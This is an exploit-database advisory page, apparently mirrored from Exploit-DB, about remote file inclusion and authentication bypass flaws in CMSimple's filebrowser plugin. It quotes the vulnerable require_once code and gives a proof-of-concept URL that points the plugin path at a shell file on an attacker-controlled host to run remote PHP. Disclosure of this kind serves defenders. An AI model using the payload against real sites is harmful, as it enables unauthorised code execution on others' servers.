header-logo
Suggest Exploit
vendor:
CMSimple
by:
7.5
CVSS
HIGH
Arbitrary PHP code execution, weak authentication security bypass
CWE
Product Name: CMSimple
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Multiple vulnerabilities in CMSimple

An attacker can bypass security restrictions, perform unauthorized actions, and execute arbitrary script code in the context of the affected application by exploiting multiple vulnerabilities in CMSimple. The vulnerabilities exist in the file 'required_classes.php' located at 'http://www.example.com/CMSimple/plugins/filebrowser/classes/'. The attacker can use the following exploit code to execute arbitrary PHP code: http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?. The exploit also affects the following files: CMSimple/2lang/index.php, CMSimple/2site/index.php, CMSimple/cmsimple/cms.php, CMSimple/index.php, CMSimple/plugins/index.php.

Mitigation:

It is recommended to update CMSimple to the latest version to mitigate these vulnerabilities. Additionally, users should ensure that the affected files mentioned in the exploit description are secured and not accessible to unauthorized users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/68961/info
 
CMSimple is prone to multiple security vulnerabilities including:
 
1. Multiple arbitrary PHP code-execution vulnerabilities
2. A weak authentication security-bypass vulnerability
3. Multiple security vulnerabilities
 
An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions and execute arbitrary script code in the context of the affected application. This may aid in further attacks. 

vulnerable file "http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php"

Vulnerable Code :
-----------------------------------vulnerable Code----------------------------------------

        require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
        require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';

exploit Code :
-------------------------------------PoC----------------------------------------

http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?

also embedded These files :
    CMSimple/2lang/index.php
    CMSimple/2site/index.php
    CMSimple/cmsimple/cms.php
    CMSimple/index.php
    CMSimple/plugins/index.php

Navigation

Suggest Exploit

Services By CQR